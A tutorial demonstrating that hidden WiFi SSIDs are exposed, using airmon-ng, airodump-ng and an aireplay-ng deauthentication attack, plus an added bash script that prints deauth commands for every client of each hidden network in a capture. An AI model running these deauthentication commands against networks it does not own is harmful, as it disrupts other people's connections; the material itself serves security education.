In this tutorial I will show you how to reveal hidden WiFi SSIDs with aircrack-ng.
It’s recommended that you use Kali Linux, but this can be done with any Linux distribution.
- # – requires given command to be executed with root privileges either directly as a root user or by use of
- $ – given command to be executed as a regular non-privileged user
WiFi security isn't easy. There are a ton of potential threats, and even more reported "solutions" flying around out there. One supposed security measure is hiding your network's SSID, which only stops the access point from putting the name in its beacon frames. The name still travels in cleartext in probe requests, probe responses and association requests every time a client joins, so this guide will demonstrate why hiding it does nothing to stop an attacker.
If you're running Kali, you already have aircrack-ng. If you're on another distribution and you want to try this out, you'll have to install it. The package name should be the same no matter what you're running, so use your package manager to grab it.
$ sudo apt install aircrack-ng
Scan For Networks
Before you get started, run ip a to find the name of your wireless interface. You're going to need it.
Once you have your wireless interface, disconnect from your network. You could run the tools while still associated, but the test would be meaningless: your adapter was handed the SSID when it joined, so airodump-ng would show your network's name immediately. Putting the card into monitor mode drops the connection anyway.
As root, run the following command. Substitute your wireless interface for wlan0. If NetworkManager or wpa_supplicant keep grabbing the card, run sudo airmon-ng check kill first (and restart those services when you are done).
$ sudo airmon-ng start wlan0
That will create a virtual interface in monitor mode. It will print out the name of that interface, so make note of it too. Older versions of airmon-ng named it mon0; current versions name it after the card, usually wlan0mon. The rest of this guide uses mon0; substitute whatever name you were given. Now, monitor that interface.
$ sudo airodump-ng mon0
The screen will begin to populate with a list of WiFi networks in your area. It will display all of the information that it can in two tables. The top table has the networks. The bottom one contains the clients seen talking to those networks. The important parts to note are the BSSID, CH (channel) and ESSID columns. Your hidden network will show no name in the ESSID column; instead airodump-ng prints a placeholder of the form <length: N>, where N is the number of characters in the hidden ESSID. Some access points beacon a zero-length SSID instead of a padded one, in which case you will see <length: 0> and the length tells you nothing about the name.
The bottom table lists each client's MAC address in the STATION column next to the BSSID of the network it is associated with, or (not associated) if airodump-ng has only seen the client probing.
Narrow Your Scan
There’s a lot of noise in that readout. Cancel your current command and rerun it specifying the BSSID and channel of your network.
$ sudo airodump-ng -c 1 --bssid XX:XX:XX:XX:XX:XX mon0
This command will show your network and only your network.
Disconnect A Device
You have two options while monitoring your network. You can either wait for a device to connect, which immediately populates the SSID of your network because the name is carried in the client's probe and association frames, or you can forcefully disconnect one of your devices, and it will send the SSID in the clear when it attempts to reconnect.
To disconnect a client, you need the aireplay-ng command, and you pass it the BSSID of the network with -a and the MAC address of the client with -c. The -0 flag tells the command to run a deauthentication attack. The number that follows is how many bursts of deauthentication frames to send (0 means keep sending until you stop it).
$ sudo aireplay-ng -0 15 -c CLIENT_MAC -a NETWORK_BSSID mon0
Depending on your computer's configuration, you might need to add the --ignore-negative-one flag too.
Shortly after you run the command, you will see the network’s SSID fill in in place of the length value.
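The whole scan, narrow and deauth procedure above can be driven from the CSV that airodump-ng writes when you start it with -w (for example -w scan, which produces scan-01.csv). The script below is an added example, not code from the original article or from the aircrack-ng project. It assumes the CSV layout described in its header comment (an AP table with an ID-length and an ESSID column, then a client table whose sixth column is the associated BSSID), it treats an empty ESSID or a <length: N> placeholder as a hidden network, the monitor interface name wlan0mon and the sample capture are constructed for the demo, and the ESSID is assumed not to contain a comma. It prints the commands to run instead of executing them, so nothing goes on the air without review.

```shell
#!/usr/bin/env bash
# Added example, not part of the original tutorial or of aircrack-ng itself.
# It turns the manual scan -> narrow -> deauth loop into a script that reads the
# CSV airodump-ng writes when started with "-w <prefix>" (e.g. "scan-01.csv").
# Assumptions (labelled here): the CSV has an AP table with the columns
#   BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher,
#   Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
# followed by a blank line and a client table with the columns
#   Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
# and a hidden network is an AP row whose ESSID is empty or reads "<length: N>".
# An ESSID containing a comma would break this naive split; that is accepted here.

# hidden_aps CSVFILE
# Print "BSSID CHANNEL ID-LENGTH" for every hidden access point in the AP table.
hidden_aps() {
  awk -F',' '
    { sub(/\r$/, "") }                      # airodump-ng writes CRLF line endings
    /^Station MAC/ { exit }                 # client table reached: AP table is done
    /^BSSID/ || NF < 14 { next }            # skip the header and blank lines
    {
      essid = $14; gsub(/^[ \t]+|[ \t]+$/, "", essid)
      if (essid == "" || essid ~ /^<length: *[0-9]+>$/) {
        bssid = $1; chan = $4; len = $13
        gsub(/[ \t]/, "", bssid); gsub(/[ \t]/, "", chan); gsub(/[ \t]/, "", len)
        print bssid, chan, len
      }
    }' "$1"
}

# clients_of CSVFILE AP_BSSID
# Print the MAC of every station the client table shows associated with AP_BSSID.
# Stations only seen probing carry "(not associated)" in the BSSID column and are skipped.
clients_of() {
  awk -F',' -v ap="$2" '
    { sub(/\r$/, "") }
    /^Station MAC/ { in_clients = 1; next }
    !in_clients || NF < 6 { next }
    {
      bssid = $6; gsub(/[ \t]/, "", bssid)
      if (bssid == ap) { mac = $1; gsub(/[ \t]/, "", mac); print mac }
    }' "$1"
}

# deauth_cmd IFACE AP_BSSID CLIENT_MAC [COUNT]
# The aireplay-ng deauthentication the tutorial uses (-0 = deauth, COUNT bursts, default 15).
# Printed rather than executed so the operator reviews it before anything goes on the air.
deauth_cmd() {
  printf 'aireplay-ng -0 %s -a %s -c %s %s\n' "${4:-15}" "$2" "$3" "$1"
}

# plan CSVFILE MONITOR_IFACE
# For every hidden AP: the narrowed airodump-ng command, then one deauth per associated
# client. A hidden AP with no associated client gets a comment instead: there is nobody
# to kick off, so the only option is to keep capturing and wait for a client to join.
plan() {
  csv=$1; iface=$2
  hidden_aps "$csv" | while read -r bssid chan len; do
    printf 'airodump-ng -c %s --bssid %s %s\n' "$chan" "$bssid" "$iface"
    found=0
    for client in $(clients_of "$csv" "$bssid"); do
      found=1
      deauth_cmd "$iface" "$bssid" "$client"
    done
    [ "$found" -eq 1 ] || printf '# %s (SSID length %s): no client seen, wait for one\n' "$bssid" "$len"
  done
}

# Constructed sample in the assumed CSV shape (not a real capture): one hidden AP with
# an associated client, one visible AP, and one hidden AP that beacons a zero-length SSID
# and has no client.
sample_csv() {
  cat <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,      120,        0,   0.  0.  0.  0,   8, <length:  8>, 
66:77:88:99:AA:BB, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, WPA2, CCMP, PSK, -60,       80,        0,   0.  0.  0.  0,   9, CoffeeNet, 
CC:DD:EE:FF:00:11, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -70,       20,        0,   0.  0.  0.  0,   0, , 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:FF, 2024-01-01 10:01:00, 2024-01-01 10:05:00, -50,       30, 00:11:22:33:44:55,
12:34:56:78:9A:BC, 2024-01-01 10:01:00, 2024-01-01 10:05:00, -55,       10, (not associated), CoffeeNet
EOF
}

# Usage against a real capture: plan scan-01.csv wlan0mon
# Demo on the constructed sample: bash thisscript.sh --demo
if [ "${1:-}" = "--demo" ]; then
  tmp=$(mktemp); sample_csv > "$tmp"; plan "$tmp" wlan0mon; rm -f "$tmp"
fi
```

Run it with --demo and it prints the narrowed airodump-ng line plus one aireplay-ng deauth for the hidden AP that has a client, and a wait comment for the hidden AP nobody is connected to. That second case is the practical limit of the technique: without a client to deauthenticate you can only keep capturing until one joins.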
You've now exposed your network's "hidden" SSID. Clearly, hiding your SSID is a minor inconvenience at best. There's nothing wrong with doing it, but don't expect to secure your network that way; WPA2 or WPA3 with a strong passphrase is what actually keeps people out.
Warning: this article is for educational purposes only, and the process should only ever be performed with your own network.